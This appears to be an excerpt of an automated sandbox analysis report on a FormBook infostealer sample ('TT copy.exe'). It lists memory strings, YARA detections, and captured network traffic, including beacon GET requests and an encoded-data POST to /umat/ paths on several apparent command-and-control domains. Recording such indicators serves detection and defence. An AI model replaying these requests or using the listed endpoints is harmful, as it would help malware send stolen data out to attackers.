0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jun 2022 06:17:37 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jun 2022 06:19:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 228X-Sorting-Hat-ShopId: 64312672485X-Dc: gcp-europe-west1X-Request-ID: 7cd6fc28-a7e1-4039-9e7f-7134e5189789X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 715650fedfd39bfb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comaM
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comionmz
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: rundll32.exe, 0000000F.00000002.776637498.0000000005EAB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.huayugw.com
            Source: rundll32.exe, 0000000F.00000002.776637498.0000000005EAB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.huayugw.com/umat/
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/(
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/0
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/9
            Source: rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/:
            Source: rundll32.exe, 0000000F.00000002.775145614.00000000034BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775060097.0000000003460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/?bT7tPLpx=YjKReNU7fpMtyeRGaGRV8DawgxIzw/dI3fdHDlQJdSAE6vSrucr3Ac
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/L
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/em32
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sassafrasriver.info/umat/om/
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1;
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/gws_rd=sslh5-
            Source: rundll32.exe, 0000000F.00000002.775080171.000000000346A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/l
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchpJ
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
            Source: unknownHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.drivetrianrepair.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.drivetrianrepair.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drivetrianrepair.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 6a 36 75 4e 4c 43 78 45 49 77 6d 33 37 62 45 4e 56 58 59 35 7a 69 79 4b 58 4f 55 37 31 45 31 36 76 6a 6e 6e 59 49 6f 78 67 44 28 69 6a 30 52 31 57 38 56 7a 4c 74 33 4d 52 46 74 44 49 2d 54 76 43 79 4c 5a 32 64 4e 42 4b 79 69 4e 28 31 38 5f 53 31 46 31 50 58 53 69 7e 41 72 58 6e 4f 52 48 42 34 54 2d 6d 71 44 6f 33 69 34 46 4d 4b 53 44 39 34 6c 50 54 71 70 54 4d 7a 4b 79 70 41 30 31 70 73 39 74 56 43 42 2d 43 74 43 56 74 6c 78 79 48 4b 63 79 6b 63 31 59 37 63 57 36 46 35 35 33 36 75 42 37 45 61 33 6b 6c 77 77 53 66 38 47 46 75 75 4f 66 43 77 78 41 45 61 73 77 62 50 6f 53 49 69 39 53 55 56 4a 42 74 36 7e 31 36 37 30 31 4c 53 71 4d 53 4e 4d 57 6d 47 6e 6b 76 5a 34 44 65 59 38 66 31 63 4f 38 61 44 62 43 4e 37 5a 53 4e 53 78 61 41 66 49 66 49 78 36 43 56 77 30 74 72 76 66 4b 6e 36 73 68 59 35 45 6f 69 74 75 70 41 62 4a 78 35 67 70 64 45 45 73 44 73 45 79 4e 55 47 42 35 4b 6d 4b 67 48 4d 6b 6d 7e 6f 70 72 71 59 39 4a 57 36 69 76 6c 45 35 53 50 46 68 76 47 54 31 49 46 53 56 48 51 68 66 63 35 72 52 4c 64 59 55 72 79 52 63 7a 57 59 41 32 6e 59 4b 37 55 43 4b 4d 37 44 45 62 55 78 57 36 54 71 50 5f 28 37 41 41 73 46 46 6d 7e 53 75 55 39 5f 64 6d 62 4c 72 62 62 6e 48 67 4d 4e 32 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=pgf8CKj6uNLCxEIwm37bENVXY5ziyKXOU71E16vjnnYIoxgD(ij0R1W8VzLt3MRFtDI-TvCyLZ2dNBKyiN(18_S1F1PXSi~ArXnORHB4T-mqDo3i4FMKSD94lPTqpTMzKypA01ps9tVCB-CtCVtlxyHKcykc1Y7cW6F5536uB7Ea3klwwSf8GFuuOfCwxAEaswbPoSIi9SUVJBt6~16701LSqMSNMWmGnkvZ4DeY8f1cO8aDbCN7ZSNSxaAfIfIx6CVw0trvfKn6shY5EoitupAbJx5gpdEEsDsEyNUGB5KmKgHMkm~oprqY9JW6ivlE5SPFhvGT1IFSVHQhfc5rRLdYUryRczWYA2nYK7UCKM7DEbUxW6TqP_(7AAsFFm~SuU9_dmbLrbbnHgMN2Q).
            Source: unknownDNS traffic detected: queries for: www.sinsegae.net
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1Host: www.sinsegae.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1Host: www.shopcycles3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1Host: www.drivetrianrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1Host: www.408wmountain.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1Host: www.huiyi-sui.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1Host: www.sarrafguler.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1Host: www.theflysnare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1Host: www.huayugw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
